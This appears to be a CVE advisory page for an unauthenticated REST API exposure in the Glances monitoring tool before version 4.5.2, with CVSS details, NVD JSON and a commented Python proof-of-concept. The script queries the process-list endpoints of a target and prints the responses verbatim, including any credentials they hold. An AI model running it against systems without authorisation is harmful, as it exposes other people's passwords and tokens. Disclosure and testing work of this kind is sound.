Security Vulnerability Report
CVE-2026-32596 CVSS 7.5 HIGH

CVE-2026-32596

Published: 2026-03-18 06:16:19
Last Modified: 2026-03-18 18:33:13

Description

Glances is an open-source, cross-platform system monitoring tool. Prior to version 4.5.2, the Glances web server runs without authentication by default when started with `glances -w`, exposing its REST API to any network client. The API returns sensitive system information, including process command lines containing credentials (passwords, API keys, tokens). Version 4.5.2 fixes the issue.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:nicolargo:glances:*:*:*:*:*:*:*:* - VULNERABLE
Glances < 4.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
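# CVE-2026-32596 PoC - Glances Web Server Unauthorized Access
# This PoC demonstrates accessing the Glances REST API without authentication
#
# Review notes:
# - Per the advisory text on this page, Glances releases before 4.5.2 serve
#   the REST API without authentication when started with `glances -w`;
#   4.5.2 is the fixed release. This script only prints the version string
#   the server reports; it does not compare it against 4.5.2.
# - The API path prefix and the response keys read below are hard-coded
#   assumptions about the server's layout. A "could not determine version"
#   result therefore does not establish that an instance is protected.
# - Everything the server returns is printed verbatim, so the output can hold
#   the same credentials the advisory describes. Handle captured output as
#   secret material.
import json
import sys

import requests

# Seconds to wait for each HTTP request before giving up.
_REQUEST_TIMEOUT = 10


def check_glances_version(target_url):
    """Return the version string reported by the Glances API, or None.

    Sends one unauthenticated GET to ``{target_url}/api/3/all`` and reads
    ``data['glances']['version']`` from the JSON body.

    Args:
        target_url: Base URL of the web server, without a trailing slash.

    Returns:
        The reported version, ``'Unknown'`` when the response has no
        ``version`` key under ``glances``, or ``None`` when the request
        fails, the status is not 200, or the body is not the expected JSON
        object.
    """
    try:
        response = requests.get(
            f"{target_url}/api/3/all", timeout=_REQUEST_TIMEOUT
        )
        if response.status_code != 200:
            # Includes 401/403: the endpoint did not answer anonymously.
            return None
        data = response.json()
    except (requests.RequestException, ValueError):
        # Connection problems, malformed URLs and non-JSON bodies all mean
        # "no version could be read"; anything else is a bug and should
        # surface instead of being swallowed.
        return None

    # A JSON array or scalar has no .get(); treat it as an unexpected schema.
    if not isinstance(data, dict):
        return None
    glances_info = data.get('glances', {})
    if not isinstance(glances_info, dict):
        return None
    return glances_info.get('version', 'Unknown')


def extract_sensitive_info(target_url):
    """Collect the JSON bodies of the process-related endpoints.

    Requests each path in ``endpoints`` without credentials and keeps the
    decoded body of every response that returns HTTP 200. Per the advisory,
    process command lines in these bodies can contain credentials.

    Args:
        target_url: Base URL of the web server, without a trailing slash.

    Returns:
        A list of ``{'endpoint': path, 'data': decoded_json}`` dicts, one per
        endpoint that answered with 200. Empty when none did.
    """
    endpoints = [
        '/api/3/processlist',
        '/api/3/processlistall',
        '/api/3/all',
    ]

    results = []
    for endpoint in endpoints:
        try:
            response = requests.get(
                f"{target_url}{endpoint}", timeout=_REQUEST_TIMEOUT
            )
            if response.status_code != 200:
                continue
            data = response.json()
        except (requests.RequestException, ValueError) as e:
            # One failing endpoint must not stop the remaining checks.
            print(f"Error accessing {endpoint}: {e}")
            continue
        results.append({'endpoint': endpoint, 'data': data})

    return results


def main():
    """Run the version check and endpoint collection against ``sys.argv[1]``.

    Exits with status 1 when no target URL is given or when the version
    check returns nothing.
    """
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-32596-poc.py <target_url>")
        print("Example: python cve-2026-32596-poc.py http://192.168.1.100:61208")
        sys.exit(1)

    # Strip the trailing slash so the path concatenation below stays clean.
    target_url = sys.argv[1].rstrip('/')

    print(f"[*] Targeting: {target_url}")

    # Check version
    version = check_glances_version(target_url)
    if version:
        print(f"[+] Glances version: {version}")
    else:
        # Not proof of a protected instance; see the review notes at the top.
        print("[-] Could not determine version or connect to target")
        sys.exit(1)

    # Extract sensitive information
    print("[*] Extracting process information...")
    results = extract_sensitive_info(target_url)

    if results:
        print(f"[+] Found {len(results)} accessible endpoints")
        for result in results:
            print(f"\n[+] Data from {result['endpoint']}:")
            # Printed verbatim: may include credentials from command lines.
            print(json.dumps(result['data'], indent=2))
    else:
        print("[-] No accessible endpoints found")


if __name__ == "__main__":
    main()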

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32596", "sourceIdentifier": "[email protected]", "published": "2026-03-18T06:16:18.800", "lastModified": "2026-03-18T18:33:12.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.2, Glances web server runs without authentication by default when started with `glances -w`, exposing REST API with sensitive system information including process command-lines containing credentials (passwords, API keys, tokens) to any network client. Version 4.5.2 fixes the issue."}, {"lang": "es", "value": "Glances es una herramienta de monitoreo de sistemas multiplataforma de código abierto. Antes de la versión 4.5.2, el servidor web de Glances se ejecuta sin autenticación por defecto cuando se inicia con 'glances -w', exponiendo la API REST con información sensible del sistema, incluyendo líneas de comando de procesos que contienen credenciales (contraseñas, claves de API, tokens) a cualquier cliente de red. 
La versión 4.5.2 soluciona el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", 
"availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nicolargo:glances:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.2", "matchCriteriaId": "3FC19E01-80F1-43BB-912C-39FE99143A59"}]}]}], "references": [{"url": "https://github.com/nicolargo/glances/commit/208d876118fea5758970f33fd7474908bd403d25", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-wvxv-4j8q-4wjq", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}